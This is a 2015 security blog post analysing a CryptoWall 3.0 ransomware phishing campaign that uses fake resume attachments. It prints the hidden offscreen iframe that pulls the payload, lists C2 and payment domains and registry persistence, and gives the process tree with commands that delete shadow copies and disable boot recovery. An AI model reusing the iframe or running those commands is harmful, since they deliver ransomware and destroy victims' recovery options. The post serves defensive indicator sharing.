CryptoWall 3.0 Still Actively Being Spread as a New Campaign is Discovered in-the-wild

June 5, 2015  By Pierluigi Paganini


A new malicious phishing campaign is spreading CryptoWall ransomware in the wild, the expert Michael Fratello has analyzed it for us.

Just a reminder to all — CryptoWall 3.0 is still very much active, with phish tactics that I think are less effective, but who knows; maybe they’re seeing great success with this method.  Personally, if successful compromise requires additional steps/execution of more than one file that’s distributed as an e-mail attachment, I would imagine that the success rate would decline.  But who knows; perhaps the opening of the attached, compressed HTML file resulting in no nefarious activity initially is being used as a method of gaining trust of the targeted user…

The New Campaign Relies on Phishing

A new campaign spreading CryptoWall 3.0 has been observed in-the-wild, and reported to the administrator of http://malware-traffic-analysis.net who shared several screenshots as well as network traffic logs captured upon execution of the malicious binary.

This campaign is a bit different than others, as it involves two (2) stages of user intervention; the user must execute the initial file attached to the e-mail within a ZIP archive, but then must execute the additional file–a binary file masked as a SCR to appear to be a legitimate Adobe Reader PDF document–which contains the CryptoWall 3.0 payload.

The phishing e-mails are being sent claiming  to contain resumes.  An example phish shared on malware-traffic-analysis is below:

CryptoWall mail

The e-mails appear to be sourced from Yahoo e-mail addresses; a large quantity of these phishing e-mails were logged by the reporting user as being sourced from different Yahoo addresses.  Headers observed within one of the e-mails reveal a sender e-mail address of:

[email protected]

With a source IP address (X-Originating-IP) of 98.1136.216.211.  The attachment, in this case, was named:

my_resume.zip

Containing a single HTML file named resume3606.html.  The HTML file is quite small, as its sole intention can be described best by the below screenshot of its source code:

CryptoWall 1.jpg

The HTML file contains an iframe that calls to what appears to be a compromised domain, now used as a C2 (command-and-control) server by the malware author.  The below URL called by the iframe has been filtered for user safety; this was still distributing the SCR file a few hours ago.

<iframe src="hxxp://coppolarestaurant.com/cgi/resume2.php?id=661" width="418" height="792" style="position:absolute;left:-10450px;"></iframe>

Upon opening the HTML document, this iframe opens the above URL which then prompts the download of a SCR file containing the CryptoWall 3.0 payload, masked to appear to the victim as a legitimate Adobe PDF document.

The attacker has modified the PE header of the file so that the SCR file’s icon is that of an Adobe Reader PDF document.

The sample SCR file examined from the above URL was named my_resume_pdf_id_6721-3921-5311.scr

Upon execution, this file launches the CryptoWall 3.0 payload that we all know and despise.

We have already seen CryptoWall 3.0 and analyzed it plenty of times, but this was one of the few times I actually got the sample to run cleanly in a sandbox, so I added some analysis results below, primarily to share new(er) C2 servers, new gateways (if any) utilized, etc.

Brief Analysis

Static Analysis

File Size: 272 KB (278,528 Bytes)
File Type: PE32 Executable (GUI)
Detection Ratio as of 06/04/2015: 4/57
Currently Detected by (as of 06/04/2015):
ESET-NOD32
Kaspersky
McAfee-GW-Edition
Qihoo-360


Dynamic Analysis


DNS Requests


ip-addr.es -> 188.165.164.184 // To get victim’s external IP


pinoyjokes.org -> 174.37.160.8 // compromised site, C2 server


gdsprint.com -> 194.28.86.134 // compromised site, C2 server


HTTP Requests


Performs various POST requests; one to ip-addr.es to obtain the victim’s external, public-facing IP address, and others to various C2 servers.  The structure of these POST requests are the same or very similar (i.e. different one-letter variable in request), but to different C2 servers:


Example request:


http:///img3.php?b=puo8cmg8gx51t9


Example response to above:


x=d208506460e4fc1b86f4c88cea33d68c3a4578b5eecc0db1a8c4f68c1c8446ab3d5ff799d7aa01efc6091dfabea00392eacdd9b8e5c01157828c1c67c4efd0


Example request:


http:///img3.php?o=7jxdqunpkp


Etcetera…


C2 Servers

coppolarestaurant.com -> 64.136.20.51


pinoyjokes.com -> 23.23.174.132


gdsprint.com -> 194.28.86.134


herp.net -> 173.254.28.111


canbroc-bg.com -> 91.215.216.13


japaneselink.net -> 157.112.152.48


Payment Gateways


Sample Subdomain: 7oqnsnzwwnm6zb7q


<subdomain>.optionpaymentprak.com/k1t7k6


<subdomain>.paygateawayoros.com/k1t7k6


<subdomain>.paymentgateposa.com/k1t7k6


<subdomain>.watchdogpayment.com/k1t7k6


Associated Files


%LocalAppData%\<sample_name>


C:\myapp.exe


Injects code into explorer.exe.


Associated Registry Entries


HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf (logged twice)


HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf (logged four times)


HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 687ddeba (logged twice)


HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *87ddeba (logged four times)


Creates Start Menu Entry (Example)


C:\Users\<profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe


Creates Files Inside User Directory (Example)


C:\Users\<profile>\AppData\Roaming\a3a659b7.exe


Mutexes


CryptoWall3 // * note this was the name I saved and analyzed sample as


qazwsxedc


Associated Domains Used for Obtaining External, Public-Facing IP Address


    

  • curlmyip.com
    • 

  • ip-addr.es
    • 

  • myexternalip.com/raw
    • 

  • 



Spawned Processes; Process Tree


C:\sample.exe


C:\sample.exe


C:\Windows\explorer.exe


C:\Windows\System32\svchost.exe -k netsvcs


C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet


C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No


C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures


Virtual Machine / Analysis Evasion


    

  • Queries a list of all running processes
    • 

  • Checks the available/free space of all local hard drives
    • 



Searches for the following files within the local file system (assumed; these strings were found in memory):


    

  • VBoxService.exe
    • 

  • vmtoolsd.exe
    • 



Treat this as a CryptoWall 3.0 refresher, and remember; keep your system updated, and don’t open e-mails, especially not e-mail attachments, from unknown senders.  Even if the e-mail appears to be from someone you know–even if the e-mail address displayed as the sender is that of someone you know–if something looks suspicious, it’s always best to trust your intuition.  Better safe than sorry.  Stay safe!


VirusTotal: https://www.virustotal.com/en/file/0bc6001307c430587b469b819e5d82828eb0396c028a82dfa9debafe66311c62/analysis/1433456705/


Malware Traffic Analysis: http://malware-traffic-analysis.net/2015/06/04/index.html


About the Author Michael Fratello




Michael Fratello is a Security Engineer employed by CipherTechs, Inc., a privately held information security services provider located in downtown Manhattan, New York.  Specializing in Penetration Testing and Digital Forensics, Michael, a St. John’s University graduate majoring in Computer Security Systems, has developed a passion for information security and often spends his free time studying, programming, and researching the exponentially growing number of threats found in-the-wild today.




Edited by Pierluigi Paganini


(Security Affairs – CryptoWall , malware)

 









    

  • 


    • 

  • 


    • 

  • 


    • 

  • 


    • 

  • 


    • 

  • 


    • 

  • 


    • 






















Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer.
Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US.
Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines.
Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”. 














 








You might also like

























    

  • 

    

    • 

  • Digging the Deep Web: Exploring the dark side of the web
    
Digging The Deep Web
    • 

  • Center for Cyber Security and International Relations Studies
    

    • 

  • 

    

    • 

  • Subscribe Security Affairs Newsletter
    
newsletter
    • 

  • SecurityAffairs awarded as Best European Cybersecurity Tech Blog at European Cybersecurity Blogger Awards
    
EU Sec Bloggers Awards 22
    • 


























More Story












Harvesting clients’ information from the utility company


A security expert explained how it is possible to hack the service provided by a utility company raising serious security...